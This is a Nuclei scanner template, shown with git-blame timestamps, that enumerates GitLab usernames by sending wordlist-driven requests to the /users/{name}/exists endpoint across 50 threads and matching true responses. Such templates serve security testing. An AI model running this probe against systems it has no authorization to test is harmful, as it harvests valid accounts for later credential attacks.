nuclei-templates/vulnerabilities/gitlab/gitlab-user-enumeration.yaml

34 lines
664 B
YAML
Raw Normal View History

2021-06-14 08:50:55 +00:00
id: gitlab-user-enumeration
2021-06-14 10:43:38 +00:00
info:
author: Suman_Kar
name: GitLab - User Enumeration
2021-06-14 08:50:55 +00:00
severity: info
2021-06-14 10:43:38 +00:00
tags: gitlab,enumeration,fuzz
requests:
- payloads:
dlist: helpers/wordlists/user-list.txt
2021-06-14 08:50:55 +00:00
attack: sniper
2021-06-14 10:43:38 +00:00
threads: 50
raw:
- |
GET /users/{{dlist}}/exists HTTP/1.1
Host: {{Hostname}}
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
Connection: keep-alive
matchers-condition: and
matchers:
- type: regex
2021-06-14 08:50:55 +00:00
part: body
2021-06-14 10:43:38 +00:00
regex:
2021-06-14 08:50:55 +00:00
- "exists.*:true"
2021-06-14 10:43:38 +00:00
- type: status
status:
- 200